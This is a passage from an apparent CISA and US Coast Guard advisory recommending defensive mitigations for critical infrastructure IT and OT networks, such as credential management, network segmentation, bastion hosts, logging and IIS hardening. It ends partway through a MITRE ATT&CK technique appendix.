<p>Many of these mitigations also align with recommendations made by CGCYBER in their <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="2024 CTIME report">2024 CTIME report</a>. The report provides relevant information and lessons learned about cybersecurity risks gathered through operations similar to this threat hunt engagement, and best practices to mitigate these risks. Please see the <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="2024 CTIME report">2024 CTIME report</a> for additional recommendations for critical infrastructure organizations to implement to harden their environments against malicious activity.</p>
<h3>Implement Unique Credentials and Access Control Measures for Administrator Accounts</h3>
<ul>
<li><strong>Provision unique and complex credentials for local administrator accounts&nbsp;</strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#UniqueCredentials2C" title="CPG 2.C">CPG 2.C</a>] on all systems. Do not use shared or identical administrative credentials across systems.<strong>&nbsp;</strong>Ensure service accounts/machine accounts have passwords unique from all member user accounts.
<ul>
<li>For example, organizations can <strong>deploy Microsoft LAPS (see Microsoft Learn’s&nbsp;</strong><a href="https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview" target="_blank" title="Windows LAPS Overview">Windows LAPS Overview</a> for more information) <strong>to</strong> ensure each machine has a unique, complex local administrator password; passwords are rotated automatically within Microsoft Active Directory, reducing the window of vulnerability; and that password retrieval is limited to authorized personnel only.</li>
</ul>
</li>
<li><strong>Require&nbsp;</strong><a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="phishing-resistant multifactor authentication (MFA)"><strong>phishing-resistant multifactor authentication (MFA)</strong></a><strong> [</strong><a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H"><strong>CPG 2.H</strong></a><strong>] in addition to unique passwords for all administrative access, including local- and domain-level administrator accounts,&nbsp;</strong>RDP sessions, and VPN&nbsp;connections.</li>
<li><strong>Use privileged access workstations (PAWs) dedicated solely for administrative tasks&nbsp;</strong>and isolate them from the internet and general network to reduce exposure to threats and lateral movement.
<ul>
<li>Harden PAWs by applying <a href="https://www.cisecurity.org/cis-benchmarks" target="_blank" title="CIS Benchmarks">CIS Benchmarks</a>: limit software to essential administrative functions, disable unnecessary services and ports, and ensure regular updates and patches.</li>
<li>Enforce strict access controls to restrict PAW access to authorized administrators only.</li>
</ul>
</li>
<li><strong>Conduct continuous auditing of privileged accounts&nbsp;</strong>by regularly collecting and analyzing logs of administrative activities, such as login attempts, command executions, and configuration changes [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#LogCollection2T" title="CPG 2.T">CPG 2.T</a>].
<ul>
<li>Configure automated alerts for anomalous behaviors, including logins outside standard hours, access from unauthorized locations, and repeated failed logins.</li>
<li>Periodically review all administrator accounts to confirm the necessity and appropriateness of access levels; align these auditing practices with <a href="https://doi.org/10.6028/NIST.SP.800-53r5" target="_blank" title="NIST SP 800-53 Rev. 5">NIST SP 800-53 Rev. 5</a> Controls AU-2 (Auditable Events) and AU-12 (Audit Record Generation).</li>
</ul>
</li>
<li><strong>Apply the principle of least privilege&nbsp;</strong>by limiting administrative privileges to the minimum required for users to perform their roles [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SeparatingUserandPrivilegedAccounts2E" title="CPG 2.E">CPG 2.E</a>].
<ul>
<li>Create individual administrative accounts with unique credentials and role-specific permissions and disable or rename built-in local administrator accounts to reduce common attack vectors.</li>
<li>Avoid using shared administrator accounts to improve accountability and auditability, and ensure administrators use standard accounts for non-administrative tasks to minimize credential exposure.</li>
<li>Implement Role-Based Access Control (RBAC) to assign permissions based on job functions, as aligned with <a href="https://doi.org/10.6028/NIST.SP.800-53r5" target="_blank" title="NIST SP 800-53 Rev. 5">NIST SP 800-53 Rev. 5</a> Control AC-5 (Separation of Duties).</li>
</ul>
</li>
<li><strong>Identify and remove unauthorized or unnecessary local administrator accounts</strong>, maintain oversight by documenting and tracking all authorized accounts, and enforce strict account management policies by restricting account creation privileges and implementing approval workflows for new administrator accounts.</li>
</ul>
<h3>Securely Store and Manage Credentials</h3>
<ul>
<li><strong>Purge credentials from the System Center Configuration Manager (SCCM)</strong>. Review SCCM packages, task sequences, and scripts to ensure that no plaintext credentials are embedded, and update or remove any configurations that deploy scripts with plaintext credentials.</li>
<li><strong>Do not store plaintext credentials in scripts</strong>. Instead, store<strong> credentials in a secure manner,&nbsp;</strong>such as with a credential/password manager or vault, or other privileged account management solution [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SecureSensitiveData2L" title="CPG 2.L">CPG 2.L</a>].
<ul>
<li>Leverage SCCM’s built-in capabilities to run tasks with administrative privileges without exposing credentials (for further guidance, refer to <a href="https://learn.microsoft.com/en-us/mem/configmgr/security/" target="_blank" title="Microsoft’s best practices for secure SCCM configuration">Microsoft’s best practices for secure SCCM configuration</a>).</li>
</ul>
</li>
<li><strong>Use encrypted communication</strong>. If scripts must retrieve credentials at runtime, use encrypted channels and protocols (e.g., TLS 1.3) to communicate with secure credential stores. Ensure that credentials are not written to disk or exposed in logs.</li>
<li><strong>Use unique local administrator passwords</strong>,<strong>&nbsp;</strong>such as by deploying Microsoft LAPS. Set appropriate permissions on Active Directory attributes used by LAPS (<code>ms-MCS-AdmPwd</code> and <code>ms-MCS-AdmPwdExpirationTime</code>) per Microsoft’s security recommendations.</li>
</ul>
<h3>Establish Network Segmentation Between IT and OT Environments</h3>
<ul>
<li><strong>Assess the existing network architecture to ensure effective segmentation between the IT and OT networks</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="CPG 2.F">CPG 2.F</a>]—this process should evaluate both logical and physical segmentation, ensuring clear boundaries between IT and OT assets.
<ul>
<li>Use <a href="https://doi.org/10.6028/NIST.SP.800-82r3" target="_blank" title="NIST SP 800-82 Rev. 3">NIST SP 800-82 Rev. 3</a> (Guide to OT Security) and <a href="https://www.isa.org/standards-and-publications/isa-standards/isa-iec-62443-series-of-standards" target="_blank" title="International Electrotechnical Commission (IEC) 62443">International Electrotechnical Commission (IEC) 62443</a> standards as guides for network segmentation best practices.</li>
<li>Network segmentation is essential for containing breaches within isolated segments and preventing them from spreading across networks. Depending on your environment, consider implementing the following segmentation:
<ul>
<li>Implement VLAN segmentation with inter-VLAN access controls.</li>
<li>Create separate VLANs for IT and OT systems, specifically isolating OT components such as SCADA systems from IT network VLANs.</li>
<li>Configure inter-VLAN access controls, including Layer 3 ACLs, to restrict traffic between IT and SCADA VLANs.</li>
<li>Deploy firewalls with application-layer filtering capabilities to monitor and control data flow between the VLANs, ensuring that only authorized protocols and devices can communicate across segments.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Implement a demilitarized zone (DMZ)</strong> <strong>between IT and OT environments</strong> to provide an additional security layer.
<ul>
<li>Position firewalls at both the IT-DMZ and OT-DMZ boundaries to filter traffic and enforce strict communication policies.</li>
<li>Configure the DMZ to act as an intermediary, with only essential communications permitted between IT and OT networks.</li>
<li>Ensure the DMZ hosts shared services (e.g., bastion hosts, jump servers, or data historians) that require limited interaction with both environments, with access controls and monitoring in place.</li>
</ul>
</li>
<li><strong>Consider a full network re-architecture if current segmentation methods cannot effectively separate IT and OT networks.</strong>
<ul>
<li>Collaborate with cybersecurity and network experts to design an architecture that meets ICS-specific security requirements—this redesign may involve transitioning to a micro-segmented or zero trust architecture, which includes strict identity verification for all users and devices attempting to access OT assets.<sup>[</sup><a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-212a#_ftnref3" title="Footnote Reference 3"><sup>3</sup></a><sup>]</sup></li>
</ul>
</li>
<li><strong>Implement unidirectional gateways (data diodes)&nbsp;</strong>where appropriate to prevent bidirectional communication.</li>
<li><strong>Keep network diagrams, configuration files, and asset inventories up to date.</strong></li>
<li><strong>Regularly test segmentation controls</strong> to validate their effectiveness in restricting unauthorized access by conducting penetration testing and security assessments.
<ul>
<li>Include simulated breach scenarios to confirm that segmentation contains threats within isolated zones.</li>
<li>Ensure compliance with <a href="https://doi.org/10.6028/NIST.SP.800-53r5" target="_blank" title="NIST SP 800-53 Rev. 5">NIST SP 800-53 Rev. 5</a> Control AC-4 (Information Flow Enforcement) to align segmentation measures with best practices for controlled information flow.</li>
</ul>
</li>
</ul>
<h4><strong>Prevent Unauthorized Access via Port 21</strong></h4>
<ul>
<li><strong>Disable File Transfer Protocol (FTP) services on SCADA devices and servers if they are not required.&nbsp;</strong>Replace FTP with secure alternatives, such as SSH FTP (SFTP) or FTP over TLS/SSL (FTPS).</li>
<li><strong>Block inbound and outbound FTP traffic on port&nbsp;</strong><code><strong>21</strong></code><strong> using firewalls and ACLs.</strong>
<ul>
<li>Implement restrictive ACL policies at network boundaries to control FTP access across all network layers.</li>
<li>As outlined in <a href="https://cas.docs.cisecurity.org/en/latest/source/Controls9/" target="_blank" title="CIS Control 9.2">CIS Control 9.2</a> (Limit Unnecessary Ports, Protocols, and Services), close any unused ports to strengthen network defenses.</li>
</ul>
</li>
<li><strong>Implement IDS/Intrusion Prevention System (IPS) technologies to monitor traffic between the IT network and SCADA VLAN</strong>, use signature and anomaly detection, and integrate IDS/IPS with a SIEM system for centralized monitoring.</li>
<li><strong>Enhance authentication and encryption mechanisms.&nbsp;</strong>Require MFA for SCADA access, use secure remote access technologies when necessary, securely encrypt communications (using protocols such as TLS 1.2 or higher, preferably TLS 1.3), and establish VPN tunnels to communicate between IT networks and SCADA systems.</li>
<li><strong>Perform network traffic filtering and deep packet inspection.</strong>
<ul>
<li>Use SCADA-aware firewalls capable of understanding SCADA protocols and inspecting and filtering traffic at the application layer.</li>
<li>Only allowlist authorized protocols and command structures to SCADA operations. Use one-way communication devices to prevent data from flowing back into the SCADA network.</li>
</ul>
</li>
</ul>
<h4><strong>Establish Secure Bastion Hosts for OT Network Access</strong></h4>
<ul>
<li><strong>Ensure bastion hosts are dedicated secure access points&nbsp;</strong>exclusively used to access the OT network and deployed as<strong> exclusive management gateways for all devices within a network</strong>.
<ul>
<li>Make bastion hosts the single access points for conducting all administrative tasks, system management, and configuration changes; this centralizes access control and ensures any interaction with the OT system passes through a rigorously monitored and secure environment, minimizing the potential for unauthorized access.</li>
</ul>
</li>
<li><strong>Do not allow staff to use bastion hosts as regular workstations</strong>.
<ul>
<li>Provide staff with separate workstations for accessing email, internet browsing, etc., on the IT network.</li>
<li>Establish and enforce policies that prohibit non-administrative activities on bastion hosts, ensuring they remain dedicated to OT network access.</li>
</ul>
</li>
<li><strong>Regularly audit and monitor bastion hosts&nbsp;</strong>to maintain security integrity, prevent unauthorized use, and quickly address any vulnerabilities or policy non-compliance.</li>
<li><strong>Configure comprehensive logging of all activities on bastion hosts,&nbsp;</strong>including authentication attempts, command executions, configuration changes, and file transfers. Aggregate logs into a SIEM.</li>
<li><strong>Isolate bastion hosts from the IT network</strong>; bastion hosts should reside in a separate security zone with restricted communication pathways<strong>&nbsp;</strong>(see CISA’s infographic on <a href="https://www.cisa.gov/sites/default/files/2023-01/layering-network-security-segmentation_infographic_508_0.pdf" title="Layering Network Security Through Segmentation">Layering Network Security Through Segmentation</a>).
<ul>
<li>Deploy bastion hosts in a DMZ, imposing physical and logical isolation from other networks.</li>
<li>Configure firewalls between the IT network, bastion hosts, and the OT network, enforcing strict access control policies to allow only necessary traffic.</li>
</ul>
</li>
<li><strong>Ensure secure configuration and hardening of bastion hosts:&nbsp;</strong>Comply with <a href="https://csrc.nist.gov/publications/detail/sp/800-123/final" target="_blank" title="NIST SP 800-123">NIST SP 800-123</a> and <a href="https://www.cisecurity.org/cis-benchmarks" target="_blank" title="CIS Benchmarks">CIS Benchmarks</a> and <a href="https://nsarchive.gwu.edu/document/22385-document-08-committee-national-security" target="_blank" title="CNSSI 4009-2015">CNSSI 4009-2015</a>, remove nonessential applications and services to reduce the attack surface, configure system settings to be secure, conduct effective patch management, enforce the principle of least functionality, and disable unused ports and protocols.</li>
<li><strong>Implement access control policies:</strong> remove any access permissions to the OT network from IT workstations and ensure only bastion hosts have access to the OT network.
<ul>
<li>Implement NAC solutions to enforce policy-driven access control decisions based on device compliance and user authentication to provide dynamic access control and real-time visibility into the devices on the network.</li>
</ul>
</li>
<li><strong>Equip each bastion host with robust authentication mechanisms,&nbsp;</strong>including<strong>&nbsp;</strong>phishing resistant MFA&nbsp;[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>], to verify the identity of users accessing the network.
<ul>
<li>Align with AAL3 as defined in <a href="https://pages.nist.gov/800-63-3/sp800-63b.html" target="_blank" title="NIST SP 800-63B">NIST SP 800-63B</a>. AAL3 requires hardware-based authenticators and proof of possession of cryptographic keys through secure authentication protocols.</li>
</ul>
</li>
<li><strong>Implement stringent access controls that restrict access to authorized personnel only using RBAC principles</strong>, ensuring that personnel can only access information and perform tasks pertinent to their roles and duties. This reduces the risk of internal threats or lateral movement and prevents unauthorized access.</li>
<li><strong>Securely configure remote access tools,&nbsp;</strong>including by using secure protocols and disabling remote access tools on IT workstations to the OT network, enforcing that all remote access occurs through bastion hosts.
<ul>
<li>Disable insecure protocols like Telnet and unencrypted VNC to prevent interception and unauthorized access.</li>
<li>Log all remote access sessions and monitor for unauthorized or anomalous activities.</li>
</ul>
</li>
</ul>
<h3>Implement Comprehensive Logging, Log Retention, and Analysis</h3>
<ul>
<li><strong>Implement comprehensive and verbose (i.e., detailed) logging across all systems,&nbsp;</strong>including workstations, servers, network devices, and security appliances [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#LogCollection2T" title="CPG 2.T">CPG 2.T</a>].
<ul>
<li>Enable logging of critical events such as authentication attempts, command-line executions with command arguments (Event ID <code>4688</code>), and network connections.</li>
</ul>
</li>
<li><strong>Aggregate logs in an out-of-band, centralized location</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SecureLogStorage2U" title="CPG 2.U">CPG 2.U</a>] where adversaries cannot tamper with them, such as a dedicated SIEM, in order to facilitate behavior analytics, anomaly detection, and proactive threat hunting [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#LogCollection2T" title="CPG 2.T">CPG 2.T</a>, <a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SecureLogStorage2U" title="2.U">2.U</a>]. For more information on behavior- and anomaly-based detection techniques, see joint guidance <a href="https://www.cisa.gov/resources-tools/resources/identifying-and-mitigating-living-land-techniques" title="Identifying and Mitigating Living off the Land">Identifying and Mitigating Living off the Land</a>.</li>
<li><strong>Ensure comprehensive logging on bastion hosts for all activities</strong>. Capture detailed records of login attempts [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#DetectionofUnsuccessfulAutomatedLoginAttempts2G" title="CPG 2.G">CPG 2.G</a>], commands executed (with command arguments enabled), configurations changed, and files transferred.
<ul>
<li>Integrate bastion hosts with a centralized SIEM (<a href="https://doi.org/10.6028/NIST.SP.800-137" target="_blank" title="NIST SP 800-137">NIST SP 800-137</a>).</li>
</ul>
</li>
<li><strong>Continuously monitor logs</strong> for early detection of anomalous activities. Configure the SIEM to generate automatic alerts for suspicious activity and implement behavior analysis techniques to detect anomalies.</li>
<li><strong>Securely store log backups and use tamper resistant storage&nbsp;</strong>[<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#SecureLogStorage2U" title="CPG 2.U">CPG 2.U</a>] to prevent a threat actor from altering or purging logs to conceal malicious activity.</li>
</ul>
<p>For additional guidance on logging, see joint guidance <a href="https://www.cyber.gov.au/sites/default/files/2024-08/best-practices-for-event-logging-and-threat-detection.pdf" target="_blank" title="Best Practices for Event Logging and Threat Detection">Best Practices for Event Logging and Threat Detection</a>.</p>
<h3>Securely Configure HTTPS Bindings and LocalSqlServer Connection String</h3>
<ul>
<li>Enforce both client certificate verification and secure renegotiation in IIS by configuring the <code>sslFlags</code> setting to <code>“3”</code> in the <code>ApplicationHost.config</code> file. Setting <code>sslFlags=“3”</code> requires clients to present valid <code>X.509</code> certificates for authentication and implements the TLS Renegotiation Indication Extension (RFC 5746). To implement this, perform the following steps:
<ul>
<li>Locate the <code>&lt;binding&gt;</code> element for the HTTPS site within <code>ApplicationHost.config</code>.</li>
<li>Set the <code>sslFlags</code> attribute to <code>“3”</code>: <code>&lt;binding protocol=“https” bindingInformation=“*:443:” sslFlags=“3” /&gt;</code>.</li>
<li>Restart IIS to apply the changes: <code>iisreset</code>.</li>
</ul>
</li>
<li><strong>Restrict the server to use only secure and up-to-date SSL/TLS protocols and cipher suites.</strong>
<ul>
<li>Disable deprecated protocols like SSL 2.0, SSL 3.0, TLS 1.0, and TLS 1.1 to prevent protocol downgrade attacks that compromise the confidentiality and integrity of data.</li>
</ul>
</li>
<li><strong>Override the global settings in&nbsp;</strong><code><strong>machine.config</strong></code> by modifying each application’s <code>web.config</code> file to define its own connection strings and providers. This isolates applications at the database level and allows for tailored security configurations for each application.</li>
<li><strong>Create dedicated SQL Server database accounts for each application with permissions limited to necessary operations&nbsp;</strong>(e.g., SELECT, INSERT, UPDATE), and avoid granting excessive privileges.
<ul>
<li>Do not assign roles like <code>db_owner</code> or sysadmin to application accounts. This reduces the risk of privilege escalation and enhances accountability through segregated access logs.</li>
</ul>
</li>
<li><strong>Use&nbsp;</strong><code><strong>machine.config</strong></code><strong> only for configurations that must be applied globally</strong> across all applications on the server.
<ul>
<li>Audit the <code>machine.config</code> file to ensure no application-specific settings are present.</li>
</ul>
</li>
</ul>
<h4><strong>Enforce Strong Password Policies</strong></h4>
<ul>
<li><strong>Implement a system-enforced policy that requires a minimum password length of 15 or more characters</strong> for all password-protected IT assets and all OT assets, when technically feasible [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#MinimumPasswordStrength2B" title="CPG 2.B">CPG 2.B</a>].
<ul>
<li><strong>Consider leveraging passphrases and password managers</strong> to make it easier for users to maintain sufficiently long passwords.</li>
</ul>
</li>
<li>In instances where minimum password lengths are not technically feasible, <strong>apply and record compensating controls, such as rate-limiting login attempts, account lockout thresholds, and strong network segmentation</strong>. Prioritize these systems for upgrade or replacement.</li>
<li><strong>Implement MFA</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>] in addition to strong passwords (i.e., passwords 15 characters or longer).</li>
</ul>
<h3>Additional Mitigation Recommendations to Strengthen Cybersecurity</h3>
<p>CISA and USCG recommend critical infrastructure organizations implement the following additional mitigations (not tied to specific findings from the engagement) to improve the cybersecurity of their IT and OT environments:</p>
<ul>
<li><strong>Secure RDP from the IT to OT environments by deploying dedicated VPNs for all remote interactions with the OT network</strong>. Using RDP without strong authentication practices can lead to credential theft. Additionally, RDP does not inherently segregate or closely monitor user sessions, which can allow a compromised session to affect other parts of the network.
<ul>
<li><strong>Deploy VPNs with strong encryption protocols such as SSL/TLS or Internet Protocol Security (IPsec)</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#StrongandAgileEncryption2K" title="CPG 2.K">CPG 2.K</a>] to safeguard data integrity and confidentiality; use MFA [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#PhishingResistantMultifactorAuthenticationMFA2H" title="CPG 2.H">CPG 2.H</a>] at all VPN access points to ensure only authorized personnel can gain access.</li>
<li><strong>Configure VPN gateways to perform rigorous security checks and manage traffic destined for the OT network</strong>, ensuring comprehensive validation of all communications through pre-defined security policies.
<ul>
<li>VPN gateways should function as the primary enforcement points for access controls, scrutinizing every data packet to detect and block unauthorized access attempts.</li>
</ul>
</li>
<li>Align the VPN traffic monitoring with the DMZ’s capabilities to <strong>regulate and inspect the data flow between IT and OT environments</strong>.</li>
<li>As part of the broader network architecture review, <strong>ensure the VPN infrastructure is correctly segmented from other network resources</strong> [<a href="https://www.cisa.gov/cybersecurity-performance-goals-cpgs#NetworkSegmentation2F" title="CPG 2.F">CPG 2.F</a>] to prevent any spillover effects from the IT environment to the OT network, containing potential breaches within isolated network zones.</li>
<li><strong>Within the VPN configuration, enforce strict routing rules that require all remote access requests to pass through the DMZ and be authenticated by bastion hosts</strong>. This minimizes the risk of unauthorized access and ensures that all remote interactions with the OT network are monitored and controlled.</li>
</ul>
</li>
<li>If wireless technology is employed within the OT environment, <strong>implement Wi-fi Protected Access 3 (WPA3)-Enterprise encryption with strong authentication protocols like Extensible Authentication Protocol (EAP)-TLS</strong> to ensure data confidentiality and integrity.
<ul>
<li>Deploy and continuously monitor Wireless Intrusion Prevention Systems (WIPS) to detect, prevent, and respond to unauthorized access attempts and anomalous activities within the wireless network infrastructure.</li>
<li>Disable unnecessary features like Service Set Identifier (SSID) broadcasting and peer-to-peer networking, enable Media Access Control (MAC) filtering as an additional layer, and keep wireless firmware updated.</li>
</ul>
</li>
</ul>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, CISA and USCG recommend exercising, testing, and validating your organization&#8217;s security program against the threat behaviors mapped to the MITRE ATT&amp;CK for Enterprise framework in this advisory. CISA and USCG recommend testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.</p>
<p>To get started:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <strong>Table 1</strong> to <strong>Table 9</strong>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program—including people, processes, and technologies—based on the data generated by this process.</li>
</ol>
<p>CISA and USCG recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Contact Information</strong></h2>
<p>Critical infrastructure organizations are encouraged to report suspicious or criminal activity related to information in this advisory to:</p>
<ul>
<li>CISA via CISA’s 24/7 Operations Center (<a href="mailto:SOC@mail.cisa.dhs.gov" title="SOC@mail.cisa.dhs.gov">SOC@mail.cisa.dhs.gov</a> or 888-282-0870) or your local <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="FBI field office">FBI field office</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
<li>Coast Guard, for Maritime Transportation System Subsector organizations. Report malicious activities to the Coast Guard’s National Response Center (1-800-424-8802) per <a href="https://www.uscg.mil/Portals/0/Images/cyber/BOS_SA_Cyber%20Reporting%20NVIC.pdf" target="_blank" title="Navigation and Vessel Inspection Circular (NVIC) 02-24">Navigation and Vessel Inspection Circular (NVIC) 02-24</a> when facilities observe any unusual activity or interruptions to their network. For additional Coast Guard resources, please visit the <a href="https://www.uscg.mil/MaritimeCyber/" target="_blank" title="Coast Guard Maritime Industry Cybersecurity Resource Center website">Coast Guard Maritime Industry Cybersecurity Resource Center website</a>. CGCYBER can also be contacted at <a href="mailto:maritimecyber@uscg.mil" target="_blank" title="maritimecyber@uscg.mil">maritimecyber@uscg.mil</a>.</li>
</ul>
<h2><strong>Additional Resources</strong></h2>
<p>For more information on improving cyber hygiene for critical infrastructure IT and OT environments, please see the following additional resources authored by CISA, CGCYBER, and international partners:</p>
<ul>
<li>CGCYBER <a href="https://www.uscg.mil/Portals/0/Images/cyber/CGCYBER%202024%20CTIME.pdf?ver=AgbTrQoh4Fs91HUmdhd_xA%3d%3d&amp;timestamp=1747657640065" target="_blank" title="2024 CTIME report">2024 CTIME Report</a></li>
<li>Joint Guidance <a href="https://www.cisa.gov/resources-tools/resources/best-practices-event-logging-and-threat-detection" title="Best Practices for Event Logging and Threat Detection">Best Practices for Event Logging and Threat Detection</a></li>
<li>Joint Guidance <a href="https://www.cisa.gov/resources-tools/resources/principles-operational-technology-cyber-security" title="Principles of Operational Technology Cyber Security">Principles of Operational Technology Cyber Security</a></li>
</ul>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. CISA and USCG do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and USCG.</p>
<h2><strong>Version History</strong></h2>
<p><strong>July 31, 2025:</strong> Initial version.</p>
<h2><strong>Appendix: MITRE ATT&amp;CK Tactics and Techniques</strong></h2>
<p>See <strong>Table 1</strong> to <strong>Table 9</strong> for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&amp;CK Mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="Decider Tool">Decider Tool</a>.</p>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table&nbsp;1: Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1078/" target="_blank" title="T1078">T1078</a></td>
<td>Malicious actors could use access to valid accounts for access to IT and OT networks.</td>
</tr>
<tr>
<td>Valid Accounts: Local Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1078/003/" target="_blank" title="T1078.003">T1078.003</a></td>
<td>Threat actors could use credentials obtained for local administrator accounts to gain administrator access to workstations or services that use the account.</td>
</tr>
<tr>
<td>Account Manipulation</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1098/" target="_blank" title="T1098">T1098</a></td>
<td>Malicious actors could modify existing accounts or create new accounts to maintain access or escalate privileges.&nbsp;</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 2: Execution</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Command and Scripting Interpreter&nbsp;</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a></td>
<td>Malicious actors could use script interpreters like PowerShell to execute commands and scripts.&nbsp;</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 3: Persistence</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Boot or Autostart Execution</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1547/" target="_blank" title="T1547">T1547</a></td>
<td>Malicious actors could configure autostart execution paths to ensure persistence.</td>
</tr>
<tr>
<td>Hijack Execution Flow</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1574/" target="_blank" title="T1574">T1574</a></td>
<td>Malicious actors could hijack the execution flow of applications and inject malicious code.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 4: Privilege Escalation</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Domain or Tenant Policy Modification</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1484/" target="_blank" title="T1484">T1484</a></td>
<td>Malicious actors could modify domain policies to escalate privileges or evade defenses.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 5: Defense Evasion</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Modify Registry</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1112/" target="_blank" title="T1112">T1112</a></td>
<td>Malicious actors could install malicious browser extensions on compromised systems.</td>
</tr>
<tr>
<td>Impair Defenses: Downgrade Attack</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1562/010/" target="_blank" title="T1562.010">T1562.010</a></td>
<td>Malicious actors could exploit vulnerabilities in older systems to force a downgrade to a less secure mode of operation.</td>
</tr>
</tbody>
</table>
</div>
<div>
<table class="tablesaw tablesaw-stack">
<caption><em>Table 6: Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Unsecured Credentials: Credentials in Files</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1552/001/" target="_blank" title="T1552.001">T1552.001</a></td>
<td>Malicious actors could search for and exploit credentials stored in unsecured files.&nbsp;</td>
</tr>
<tr>
<td>OS Credential Dumping</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1003/" target="_blank" title="T1003">T1003</a></td>
<td>Malicious actors could extract credentials from memory or storage from unsecured workstations.</td>
</tr>
<tr>
<td>Adversary-in-the-Middle</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1557/" target="_blank" title="T1557">T1557</a></td>
<td>Malicious actors could position themselves between networked devices to intercept credentials and other data.&nbsp;</td>
</tr>
<tr>
<td>Brute Force: Password Guessing</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1110/001/" target="_blank" title="T1110.001">T1110.001</a></td>
